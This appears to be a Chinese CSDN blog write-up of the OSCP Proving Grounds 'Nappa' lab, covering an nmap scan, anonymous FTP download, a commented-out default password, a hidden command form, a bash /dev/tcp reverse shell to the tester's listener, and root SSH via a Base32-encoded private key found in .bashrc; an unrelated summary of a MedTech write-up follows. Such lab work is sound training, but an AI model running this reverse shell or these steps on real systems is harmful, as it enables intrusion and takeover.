OSCP - Proving Grounds - Nappa

主要知识点

观察

  • 对于web page source代码的观察,寻找有价值的信息,例如注释,资源来源等
  • 对于服务器环境变量的观察,.bashrc等,寻找有价值信息

具体步骤

执行nmap扫描,发现21端口的ftp服务支持匿名登陆,8080/28080端口安装了web应用,60022端口则为ssh服务.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 11:20 UTC
Nmap scan report for #remote_ip#
Host is up (0.00095s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x   14 14       11           4096 Nov 06  2020 forum
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to #remote_ip#
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '#remote_ip#' is not allowed to connect to this MariaDB server
8080/tcp  open  http-proxy
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 3102
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <title>Action Controller: Exception caught</title>
|     <style>
|     body {
|     background-color: #FAFAFA;
|     color: #333;
|     margin: 0px;
|     body, p, ol, ul, td {
|     font-family: helvetica, verdana, arial, sans-serif;
|     font-size: 13px;
|     line-height: 18px;
|     font-size: 11px;
|     white-space: pre-wrap;
|     pre.box {
|     border: 1px solid #EEE;
|     padding: 10px;
|     margin: 0px;
|     width: 958px;
|     header {
|     color: #F0F0F0;
|     background: #C52F24;
|     padding: 0.5em 1.5em;
|     margin: 0.2em 0;
|     line-height: 1.1em;
|     font-size: 2em;
|     color: #C52F24;
|     line-height: 25px;
|     .details {
|_    bord
|_http-title: ForumOnRails
28080/tcp open  http       Apache httpd 2.4.46 ((Unix))
|_http-server-header: Apache/2.4.46 (Unix)
|_http-title: html5-goku-en-javascript
| http-methods: 
|_  Potentially risky methods: TRACE
60022/tcp open  ssh        OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   3072 76:61:5c:e1:8c:ca:14:e8:7a:63:ba:a3:46:9f:09:b3 (RSA)
|   256 e3:ed:fc:a8:10:d7:8e:b1:7c:de:a2:59:df:19:06:29 (ECDSA)
|_  256 e5:dd:dd:a7:e3:ac:5f:b9:2b:4b:d0:27:e3:3c:c2:43 (ED25519)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.94SVN%I=7%D=9/18%Time=66EAB792%P=x86_64-pc-linux-gnu%r
SF:(NULL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.49\.54'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");

下载FTP服务器的文件到本地,发现是一个ruby on rails 构建的web应用,搜索一下google,发现已经N多年没有人维护,粗略看一下,没有有趣的地方,也尝试用Gemfile中的ruby和rails版本搜索相关漏洞,得到的结果没有太多可利用的价值

wget -r --user="anonymous" --password="a" ftp://#remote_ip#

尝试创建一个用户来获得更多的信息,通过观察注册页面源码,发现有一段注释掉的默认密码

而注册后可以看到一个admin.forum发的贴子,点进去可以看到邮箱地址,组合起来就是登录所需要的用户名admin.forum@easysetting.com,而潜在的密码为 上图中注释掉的部分

尝试登录后,点击server status 按钮后,来到 serverinfo页面,观察源码后,发现一个注释掉的表单,看input name,也许可以执行服务器命令来建立reverse shell,

通过在web console编辑html页面,将上图中注释掉的部分复制到新的表单元素中,记得删除readonly属性

在本地启动nc -nlvp 9000监听,并在页面输入 bash -i >& /dev/tcp/#local_ip#/9000 0>&1 ,提交后得到reverse shell

通过观察 kathleen的.bashrc文件得到如下,其中最下面注释掉的部分很有意思,复制下来

利用CyberChef来尝试机密,尝试了Base64等编码后,发现是 Base32编码,得到一个私钥

尝试利用私钥+root用户 ssh到remote server上,成功

总体上讲,先后尝试了linpeas,pspy64,等工具去寻找突破口,都无果,都怪自己观察不够仔细,浪费了很多时间。

至于另一个端口,28080,则是一段动画,没有深入研究,不清楚是否是该靶机的另外一个解法

OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值